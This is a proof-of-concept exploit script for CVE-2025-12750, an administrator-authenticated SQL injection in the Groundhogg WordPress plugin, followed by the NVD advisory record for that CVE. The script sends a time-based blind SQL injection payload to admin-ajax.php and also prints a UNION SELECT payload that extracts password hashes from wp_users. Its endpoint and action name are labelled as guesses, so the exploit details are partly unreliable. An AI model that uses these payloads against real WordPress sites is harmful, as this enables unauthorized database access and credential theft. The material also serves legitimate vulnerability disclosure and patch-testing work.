CVE-2025-12750

# CVE-2025-12750 SQL Injection PoC for Groundhogg Plugin # Requires Administrator-level access import requests import sys target_url = "http://target-wordpress-site.com" # Obtain valid admin session cookie first admin_cookie = "wordpress_admin_cookie_here" # SQL Injection payload in 'term' parameter # Using time-based blind SQL injection technique payload = "test' AND (SELECT 7741 FROM (SELECT(SLEEP(5)))X)-- -" # Target endpoint - typically in admin-ajax.php or plugin's search functionality endpoint = f"{target_url}/wp-admin/admin-ajax.php" params = { "action": "groundhogg_search", # Example action name "term": payload } headers = { "Cookie": admin_cookie, "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Sending SQL injection payload to {endpoint}") print(f"[*] Payload: {payload}") try: response = requests.post(endpoint, data=params, headers=headers, timeout=30) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection confirmed! Response time indicates successful injection.") print(f"[+] Response time: {response.elapsed.total_seconds()}s") else: print("[-] Injection may have failed or target is not vulnerable.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Data extraction payload example data_extraction_payload = "test' UNION SELECT 1,2,user_pass,4,5,6,7,8 FROM wp_users WHERE '1'='1" print(f"\n[*] Example data extraction payload: {data_extraction_payload}")

{"cve": {"id": "CVE-2025-12750", "sourceIdentifier": "[email protected]", "published": "2025-11-21T10:15:48.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Groundhogg — CRM, Newsletters, and Marketing Automation plugin for WordPress is vulnerable to SQL Injection via the 'term' parameter in all versions up to, and including, 4.2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/groundhoggwp/groundhogg/blob/master/includes/functions.php#L5705", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394550%40groundhogg&new=3394550%40groundhogg&sfp_email=&sfph_mail=#file14", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d231e1-a63e-4b41-a6b7-91e6dfc33600?source=cve", "source": "[email protected]"}]}}